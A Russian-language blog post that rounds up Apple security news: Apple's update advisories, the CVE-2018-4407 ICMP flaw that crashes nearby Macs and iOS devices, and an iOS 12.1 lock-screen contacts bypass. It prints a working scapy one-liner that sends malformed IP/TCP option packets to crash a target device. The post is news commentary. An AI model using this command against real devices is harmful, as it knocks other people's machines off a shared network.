Апдейты по безопасности Apple

За последние пару дней накопилось сразу несколько интересных заметок про всякие вещи, связанные с информационной безопасностью и Apple одновременно, поэтому я собрал их все в одном посте.

Вчера Apple наконец-то выложила обновленные статьи о различных улучшениях безопасности (читай — исправленных уязвимостях) в последних версиях операционных систем. Ссылки на содержимое апдейтов в каждой операционной системе, а также в других продуктах компании, можно найти тут:
https://support.apple.com/en-us/HT201222. Я думаю, что тут достаточно упомянуть, что термин “arbitrary code” встречается в статье о содержимом апдейтов macOS 10.14 Mojave двадцать один раз.

Там же и такая прекрасная уязвимость под номером CVE-2018-4407 в обработке получения ICMP пакетов, позволяющая “завалить” работающие в той же сети Мак с High Sierra и ios-устройства с iOS 11, как продемонстрировано на этом видео в твите:


команда для исполнения этой уязвимости тоже умещается в один твит:

pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1″*18),(19, “2”*18)]))

Ну и, как обычно, любители потестировать экран блокировки iOS, обнаружили возможность получить доступ к контактам в заблокированном устройстве в свежевышедшей iOS 12.1:

Шаги там не самые тривиальные, но тем не менее, доступ к данным адресной книги получить можно. Мне кажется, что кому-то в отделе тестирования Apple неплохо было бы сделать внушение, потому что ну сколько можно уже, это далеко не первый подобный случай.